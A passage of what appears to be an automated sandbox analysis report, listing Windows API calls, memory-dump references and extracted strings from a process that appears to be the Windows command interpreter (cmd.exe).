                                    • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?), ref: 011F9529
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Error$CurrentDirectoryModememset$EnvironmentLastVariable
                                    • String ID:
                                    • API String ID: 920682188-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000040), ref: 011F17D7
                                    • CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,?,00000000,001F0001), ref: 011F1805
                                    • ReleaseMutex.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,wil,00000000,?,?,?,?), ref: 011F189F
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?), ref: 011F18EF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Mutex$CloseCreateCurrentHandleProcessRelease
                                    • String ID: Local\SM0:%d:%d:%hs$wil
                                    • API String ID: 3048291649-2303653343
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(000003E8,011FBE78,00000010), ref: 011E6E40
                                    • _amsg_exit.MSVCRT ref: 011E6E55
                                    • _initterm.MSVCRT ref: 011E6EA9
                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 011E6ED5
                                    • exit.MSVCRT ref: 011E6F1C
                                    • _XcptFilter.MSVCRT ref: 011E6F2E
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: CurrentFilterImageNonwritableSleepXcpt_amsg_exit_inittermexit
                                    • String ID:
                                    • API String ID: 796493780-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,000000FF,00000000,?,?,011F7929,00000000,011F9313,00000000,00000000,?,011E9814,00000000), ref: 011E4C55
                                    • GetExitCodeProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,000000FF,?,011F7929,00000000,011F9313,00000000,00000000,?,011E9814,00000000), ref: 011E4C60
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,011F7929,00000000,011F9313,00000000,00000000,?,011E9814,00000000), ref: 011E4C7B
                                    • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,011F7929,00000000,011F9313,00000000,00000000,?,011E9814,00000000), ref: 011EEE57
                                    • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,011F7929,00000000,011F9313,00000000,00000000,?,011E9814,00000000), ref: 011EEE6D
                                    • fprintf.MSVCRT ref: 011EEE81
                                    • fflush.MSVCRT ref: 011EEE8F
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: CriticalSection$CloseCodeEnterExitHandleLeaveObjectProcessSingleWaitfflushfprintf
                                    • String ID:
                                    • API String ID: 4271573189-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(?,00000104,8C8BFE4F,00000001,?), ref: 011E0816
                                      • Part of subcall function 011E0D51: memset.MSVCRT ref: 011E0D7D
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • towupper.MSVCRT ref: 011E0B44
                                      • Part of subcall function 011DE040: memset.MSVCRT ref: 011DE090
                                      • Part of subcall function 011DE040: wcschr.MSVCRT ref: 011DE0F3
                                      • Part of subcall function 011DE040: wcschr.MSVCRT ref: 011DE10B
                                      • Part of subcall function 011DE040: _wcsicmp.MSVCRT ref: 011DE179
                                    • wcschr.MSVCRT ref: 011E0932
                                    • wcsncmp.MSVCRT(00000000,011D218C,00000004,00000002,00007FE7), ref: 011E0A76
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEAB7
                                      • Part of subcall function 011DEA40: iswspace.MSVCRT ref: 011DEB2D
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB49
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB6D
                                      • Part of subcall function 011D6980: _get_osfhandle.MSVCRT ref: 011D6A06
                                      • Part of subcall function 011D6980: GetFileSize.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011D6A10
                                      • Part of subcall function 011D6980: _wcsnicmp.MSVCRT ref: 011D6A3D
                                      • Part of subcall function 011D6980: _get_osfhandle.MSVCRT ref: 011D6A64
                                      • Part of subcall function 011D6980: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011D6A6E
                                      • Part of subcall function 011D6980: _get_osfhandle.MSVCRT ref: 011D6A8E
                                      • Part of subcall function 011D6980: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011D6AA0
                                      • Part of subcall function 011D6980: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,00000001), ref: 011D6AC0
                                      • Part of subcall function 011D6980: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20), ref: 011D6AD1
                                      • Part of subcall function 011D6980: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011FD620,00000200,00000000,00000000), ref: 011D6AE7
                                      • Part of subcall function 011D6980: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20), ref: 011D6AF4
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 011ECCDE
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: wcschr$File$_get_osfhandlememset$LockPointerShared$AcquireConsoleErrorLastReadReleaseSizeTitleType_wcsicmp_wcsnicmpiswspacetowupperwcsncmp
                                    • String ID:
                                    • API String ID: 1803274588-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • memset.MSVCRT ref: 011E4861
                                    • memset.MSVCRT ref: 011E4881
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E4991
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E499E
                                    • longjmp.MSVCRT(0120B8B8,00000001,00007FE9,00007FE9,?,?,?,?,00000000,?), ref: 011EE94C
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: memset$Heap$AllocProcesslongjmp
                                    • String ID:
                                    • API String ID: 2656838167-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _get_osfhandle.MSVCRT ref: 011E99E9
                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 011E99F1
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000002,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 011E9A30
                                    • _get_osfhandle.MSVCRT ref: 011E9A49
                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 011E9A51
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Console$Write_get_osfhandle$Mode
                                    • String ID:
                                    • API String ID: 1066134489-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _tell.MSVCRT ref: 011DE5F9
                                    • _close.MSVCRT ref: 011DE62C
                                    • memset.MSVCRT ref: 011DE6CC
                                    • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00007FE7), ref: 011DE736
                                    • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,01203840), ref: 011DE747
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011DE772
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: ConsoleInfoOutput_close_tellmemset
                                    • String ID:
                                    • API String ID: 1380661413-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 011E269C: _get_osfhandle.MSVCRT ref: 011E26A7
                                      • Part of subcall function 011E269C: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011DC5F8,?,?,?), ref: 011E26B6
                                      • Part of subcall function 011E269C: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,?,?,011DC5C6), ref: 011E26D2
                                      • Part of subcall function 011E269C: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,00000002), ref: 011E26E1
                                      • Part of subcall function 011E269C: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011E26EC
                                      • Part of subcall function 011E269C: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,011DC5C6), ref: 011E26F5
                                    • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,00000000,?,?,0120B980,00000002,00000000,?,011E9CA6,%s %s ,?,00000000,00000000), ref: 011E2667
                                    • _get_osfhandle.MSVCRT ref: 011E2677
                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,011E9CA6,%s %s ,?,00000000,00000000), ref: 011E267F
                                    • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20), ref: 011E2694
                                      • Part of subcall function 011E27C8: _get_osfhandle.MSVCRT ref: 011E27DB
                                      • Part of subcall function 011E27C8: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,0120B980,000000FF,011FD620,00002000,00000000,00000000), ref: 011E281C
                                      • Part of subcall function 011E27C8: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,011FD620,-00000001,?,00000000), ref: 011E2831
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
                                    • String ID:
                                    • API String ID: 4057327938-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _get_osfhandle.MSVCRT ref: 011E27DB
                                    • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,0120B980,000000FF,011FD620,00002000,00000000,00000000), ref: 011E281C
                                    • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,011FD620,-00000001,?,00000000), ref: 011E2831
                                    • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0120B980,?,?,00000000), ref: 011ED70D
                                    • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,0120B980,00001000,011FD620,00002000,00000000,00000000,00000000), ref: 011ED730
                                    • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,011FD620,00000000,?,00000000), ref: 011ED74E
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                    • String ID:
                                    • API String ID: 3249344982-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 011F2D6D: WaitForSingleObjectEx.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,000000FF,00000000,00000000,00000000,?,011F1838,?), ref: 011F2D7C
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?), ref: 011F26CD
                                      • Part of subcall function 011F2DB4: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,?,011F26A5,?), ref: 011F2DBD
                                      • Part of subcall function 011F2DB4: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,00000000,?,011F26A5,?), ref: 011F2DC6
                                      • Part of subcall function 011F2DB4: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,011F26A5,?), ref: 011F2DDF
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 011F26ED
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 011F26FD
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?), ref: 011F2709
                                    • RtlFreeHeap.NTDLL(00000000), ref: 011F2710
                                    • ReleaseMutex.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?), ref: 011F2720
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: CloseHandle$ErrorHeapLast$FreeMutexObjectProcessReleaseSingleWait
                                    • String ID:
                                    • API String ID: 2383944720-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEAB7
                                      • Part of subcall function 011DEA40: iswspace.MSVCRT ref: 011DEB2D
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB49
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB6D
                                    • _wcsicmp.MSVCRT ref: 011F6EFC
                                    • _wcsicmp.MSVCRT ref: 011F6F1B
                                    • _wcsicmp.MSVCRT ref: 011F6F41
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: _wcsicmpwcschr$iswspace
                                    • String ID: KEYS$LIST$OFF
                                    • API String ID: 3924973218-4129271751
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?), ref: 011F26CD
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 011F26ED
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 011F26FD
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?), ref: 011F2709
                                    • RtlFreeHeap.NTDLL(00000000), ref: 011F2710
                                    • ReleaseMutex.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?), ref: 011F2720
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: CloseHandle$Heap$FreeMutexProcessRelease
                                    • String ID:
                                    • API String ID: 1689195821-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _get_osfhandle.MSVCRT ref: 011E0183
                                    • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011ED6A1), ref: 011E018D
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 011E01B8
                                    • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,00000001), ref: 011E01C7
                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011E01D2
                                    • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20), ref: 011E01DB
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                    • String ID:
                                    • API String ID: 513048808-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _get_osfhandle.MSVCRT ref: 011E26A7
                                    • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011DC5F8,?,?,?), ref: 011E26B6
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,?,?,011DC5C6), ref: 011E26D2
                                    • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,00000002), ref: 011E26E1
                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011E26EC
                                    • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,011DC5C6), ref: 011E26F5
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                    • String ID:
                                    • API String ID: 513048808-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                    • memset.MSVCRT ref: 011EC954
                                    • longjmp.MSVCRT(0120B8F8,000000FF,00000000,01203892,01203890,?,?,?,?,011DFD5C,?,?,?,011E837D,00000000), ref: 011EC96D
                                    • memcpy.MSVCRT ref: 011EC987
                                    • longjmp.MSVCRT(0120B8F8,000000FF,01203892,01203890,?,?,?,?,011DFD5C,?,?,?,011E837D,00000000), ref: 011EC9D3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Heaplongjmp$AllocProcessmemcpymemset
                                    • String ID: 0123456789
                                    • API String ID: 2034586978-2793719750
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • memset.MSVCRT ref: 011E63D6
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEAB7
                                      • Part of subcall function 011DEA40: iswspace.MSVCRT ref: 011DEB2D
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB49
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB6D
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E64BF
                                    • iswspace.MSVCRT ref: 011EF751
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: wcschr$iswspacememset
                                    • String ID: %s
                                    • API String ID: 2220997661-3043279178
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • longjmp.MSVCRT(0120B8F8,00000001,00000000,011F8DAB,?,?,?,?,00000000,?,00000021,00000000,?,?,?,00000000), ref: 011F865D
                                    • memset.MSVCRT ref: 011F86B6
                                    • memset.MSVCRT ref: 011F86E4
                                    • memset.MSVCRT ref: 011F8712
                                      • Part of subcall function 011DCD27: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,011F9362,00000000,00000000,?,011E9814,00000000), ref: 011DCD55
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                      • Part of subcall function 011D585F: VirtualAlloc.API-MS-WIN-CORE-MEMORY-L1-1-0(00000000,0000FE00,00001000,00000004,00000000,?,00000001,?,011F87AD,?,00000000,-00000105,-00000105,-00000105), ref: 011D5875
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: memset$AllocCloseFindVirtuallongjmp
                                    • String ID: %9d
                                    • API String ID: 973120493-2241623522
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RtlCreateUnicodeStringFromAsciiz.NTDLL(?,?), ref: 011F64A1
                                    • GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000040,00000000), ref: 011F6517
                                    • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 011F657F
                                    Strings
                                    • %WINDOWS_COPYRIGHT%, xrefs: 011F6487
                                    • Copyright (c) Microsoft Corporation. All rights reserved., xrefs: 011F646E
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Global$AllocAsciizCreateFreeFromStringUnicode
                                    • String ID: %WINDOWS_COPYRIGHT%$Copyright (c) Microsoft Corporation. All rights reserved.
                                    • API String ID: 1103618819-4062316587
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0(001F0003,00000000,?), ref: 011F2CA5
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011F2CB7
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 011F2D29
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: CloseErrorHandleLastOpenSemaphore
                                    • String ID: _p0$wil
                                    • API String ID: 3419097560-1814513734
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _wcsnicmp.MSVCRT ref: 011F4635
                                      • Part of subcall function 011E7721: __iob_func.MSVCRT ref: 011E7726
                                    • fprintf.MSVCRT ref: 011F45B5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: __iob_func_wcsnicmpfprintf
                                    • String ID: CMD Internal Error %s$%s$Null environment
                                    • API String ID: 1828771275-2781220306
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 011DDEF9: iswspace.MSVCRT ref: 011DDF07
                                      • Part of subcall function 011DDEF9: wcschr.MSVCRT ref: 011DDF18
                                    • wcschr.MSVCRT ref: 011D6914
                                    • wcschr.MSVCRT ref: 011D6926
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: wcschr$iswspace
                                    • String ID: &<|>$+: $=,;
                                    • API String ID: 3458554142-2256444845
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,02000000,?), ref: 011D449A
                                    • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,UBR,00000000,?,?,?), ref: 011D44BE
                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 011D44C9
                                    Strings
                                    • Software\Microsoft\Windows NT\CurrentVersion, xrefs: 011D4490
                                    • UBR, xrefs: 011D44B6
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
                                    • API String ID: 3677997916-3870813718
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(KERNEL32.DLL,?,?,?,011E4533), ref: 011E4687
